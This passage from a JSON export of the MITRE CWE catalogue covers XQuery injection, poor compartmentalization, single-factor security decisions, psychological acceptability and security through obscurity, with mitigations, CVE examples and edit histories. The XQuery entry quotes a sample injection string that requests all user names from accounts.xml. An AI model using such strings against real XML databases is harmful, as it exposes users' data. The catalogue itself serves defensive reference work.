File","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through WSDL File","attr":{"@_Date":"2020-02-24"}}]}},"652":{"attr":{"@_ID":"652","@_Name":"Improper Neutralization of Data within XQuery Expressions (\'XQuery Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.","Extended_Description":"The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"91","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker might be able to read sensitive information from the XML database."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use parameterized queries. This will help ensure separation between data plane and control plane."},{"Phase":"Implementation","Description":"Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XQL queries is safe in that context."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An attacker may pass XQuery expressions embedded in an otherwise standard XML document. The attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back. doc(accounts.xml)//user[name=\'*\'] The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":46,"Entry_Name":"XQuery Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unsafe Treatment of XQuery Input","attr":{"@_Date":"2008-10-14"}},{"#text":"Failure to Sanitize Data within XQuery Expressions (aka \'XQuery Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data within XQuery Expressions (\'XQuery Injection\')","attr":{"@_Date":"2010-04-05"}}]}},"653":{"attr":{"@_ID":"653","@_Name":"Improper Isolation or Compartmentalization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions.","Extended_Description":"When a weakness occurs in functionality that is accessible by lower-privileged users, then without strong boundaries, an attack might extend the scope of the damage to higher-privileged users.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Separation of Privilege","Description":"Some people and publications use the term \\"Separation of Privilege\\" to describe this weakness, but this term has dual meanings in current usage. This node conflicts with the original definition of \\"Separation of Privilege\\" by Saltzer and Schroeder; that original definition is more closely associated with CWE-654. Because there are multiple interpretations, use of the \\"Separation of Privilege\\" term is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"The exploitation of a weakness in low-privileged areas of the software can be leveraged to reach higher-privileged areas without having to overcome any additional obstacles."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Break up privileges between different modules, objects, or entities. Minimize the interfaces between modules and require strong access control between them."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Single sign-on technology is intended to make it easier for users to access multiple resources or domains without having to authenticate each time. While this is highly convenient for the user and attempts to address problems with psychological acceptability, it also means that a compromise of a user\'s credentials can provide immediate access to all other resources or domains."},{"Intro_Text":"The traditional UNIX privilege model provides root with arbitrary access to all resources, but root is frequently the only user that has privileges. As a result, administrative tasks require root privileges, even if those tasks are limited to a small area, such as updating user manpages. Some UNIX flavors have a \\"bin\\" user that is the owner of system executables, but since root relies on executables owned by bin, a compromise of the bin account can be leveraged for root privileges by modifying a bin-owned executable, such as CVE-2007-4238."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-535"}},{"attr":{"@_External_Reference_ID":"REF-1138"}}]},"Notes":{"Note":[{"#text":"There is a close association with CWE-250 (Execution with Unnecessary Privileges). CWE-653 is about providing separate components for each \\"privilege\\"; CWE-250 is about ensuring that each component has the least amount of privileges possible. In this fashion, compartmentalization becomes one mechanism for reducing privileges.","attr":{"@_Type":"Relationship"}},{"#text":"The term \\"Separation of Privilege\\" is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (this node) and using only one factor in a security decision (CWE-654). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Insufficient Compartmentalization","attr":{"@_Date":"2009-01-12"}}}},"654":{"attr":{"@_ID":"654","@_Name":"Reliance on a Single Factor in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A protection mechanism relies exclusively, or to a large extent, on the evaluation of a single condition or the integrity of a single object or entity in order to make a decision about granting access to restricted resources or functionality.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Separation of Privilege","Description":"Some people and publications use the term \\"Separation of Privilege\\" to describe this weakness, but this term has dual meanings in current usage. While this entry is closely associated with the original definition of \\"Separation of Privilege\\" by Saltzer and Schroeder, others use the same term to describe poor compartmentalization (CWE-653). Because there are multiple interpretations, use of the \\"Separation of Privilege\\" term is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If the single factor is compromised (e.g. by theft or spoofing), then the integrity of the entire security mechanism can be violated with respect to the user that is identified by that factor."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"It can become difficult or impossible for the product to be able to distinguish between legitimate activities by the entity who provided the factor, versus illegitimate activities by an attacker."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use multiple simultaneous checks before granting access to critical operations or granting critical privileges. A weaker but helpful mitigation is to use several successive checks (multiple layers of security)."},{"Phase":"Architecture and Design","Description":"Use redundant access rules on different choke points (e.g., firewalls)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Password-only authentication is perhaps the most well-known example of use of a single factor. Anybody who knows a user\'s password can impersonate that user."},{"Intro_Text":"When authenticating, use multiple factors, such as \\"something you know\\" (such as a password) and \\"something you have\\" (such as a hardware-based one-time password generator, or a biometric device)."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"274"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-535"}}]},"Notes":{"Note":{"#text":"This entry is closely associated with the term \\"Separation of Privilege.\\" This term is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (CWE-653) and using only one factor in a security decision (this entry). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Reliance on a Single Factor in a Security Decision","attr":{"@_Date":"2009-01-12"}}}},"655":{"attr":{"@_ID":"655","@_Name":"Insufficient Psychological Acceptability","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"By bypassing the security mechanism, a user might leave the system in a less secure state than intended by the administrator, making it more susceptible to compromise."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Where possible, perform human factors and usability studies to identify where your product\'s security mechanisms are difficult to use, and why."},{"Phase":"Architecture and Design","Description":"Make the security mechanism as seamless as possible, while also providing the user with sufficient details when a security decision produces unexpected results."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In \\"Usability of Security: A Case Study\\" [REF-540], the authors consider human factors in a cryptography product. Some of the weakness relevant discoveries of this case study were: users accidentally leaked sensitive information, could not figure out how to perform some tasks, thought they were enabling a security option when they were not, and made improper trust decisions."},{"Intro_Text":"Enforcing complex and difficult-to-remember passwords that need to be frequently changed for access to trivial resources, e.g., to use a black-and-white printer. Complex password requirements can also cause users to store the passwords in an unsafe manner so they don\'t have to remember them, such as using a sticky note or saving them in an unencrypted file."},{"Intro_Text":"Some CAPTCHA utilities produce images that are too difficult for a human to read, causing user frustration."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-539"}},{"attr":{"@_External_Reference_ID":"REF-540"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 14: Poor Usability.&#34; Page 217"}}]},"Notes":{"Note":{"#text":"This weakness covers many security measures causing user inconvenience, requiring effort or causing frustration, that are disproportionate to the risks or value of the protected assets, or that are perceived to be ineffective.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Failure to Satisfy Psychological Acceptability","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Satisfy Psychological Acceptability","attr":{"@_Date":"2009-05-27"}}]}},"656":{"attr":{"@_ID":"656","@_Name":"Reliance on Security Through Obscurity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism.","Extended_Description":"This reliance on \\"security through obscurity\\" can produce resultant weaknesses if an attacker is able to reverse engineer the inner workings of the mechanism. Note that obscurity can be one small part of defense in depth, since it can create more work for an attacker; however, it is a significant risk if used as the primary means of protection.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"259","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"321","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"472","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Never Assuming your secrets are safe"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"The security mechanism can be bypassed easily."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Always consider whether knowledge of your code or design is sufficient to break it. Reverse engineering is a highly successful discipline, and financially feasible for motivated adversaries. Black-box techniques are established for binary analysis of executables that use obfuscation, runtime analysis of proprietary protocols, inferring file formats, and others."},{"Phase":"Architecture and Design","Description":"When available, use publicly-vetted algorithms and procedures, as these are more likely to undergo more extensive security analysis and testing. This is especially the case with encryption and authentication."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The design of TCP relies on the secrecy of Initial Sequence Numbers (ISNs), as originally covered in CVE-1999-0077. If ISNs can be guessed (due to predictability, CWE-330) or sniffed (due to lack of encryption, CWE-311), then an attacker can hijack or spoof connections. Many TCP implementations have had variations of this problem over the years, including CVE-2004-0641, CVE-2002-1463, CVE-2001-0751, CVE-2001-0328, CVE-2001-0288, CVE-2001-0163, CVE-2001-0162, CVE-2000-0916, and CVE-2000-0328.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-542"}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6588","Description":"Reliance on hidden form fields in a web application. Many web application vulnerabilities exist because the developer did not consider that \\"hidden\\" form fields can be processed using a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6588"},{"Reference":"CVE-2006-7142","Description":"Hard-coded cryptographic key stored in executable program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142"},{"Reference":"CVE-2005-4002","Description":"Hard-coded cryptographic key stored in executable program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4002"},{"Reference":"CVE-2006-4068","Description":"Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-544"}}]},"Notes":{"Note":{"#text":"Note that there is a close relationship between this weakness and CWE-603 (Use of Client-Side Authentication). If developers do not believe that a user can reverse engineer a client, then they are more likely to choose client-side authentication in the belief that it is safe.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Reliance on Security through Obscurity","attr":{"@_Date":"2009-01-12"}}}},"657":{"attr":{"@_ID":"657","@_Name":"Violation of Secure Design Principles","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product violates well-established principles for secure design.","Extended_Description":"This can introduce resultant weaknesses or make it easier for developers to introduce related weaknesses during implementation. Because code is centered around design, it can be resource-intensive to fix design problems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-546"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-01-30","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated 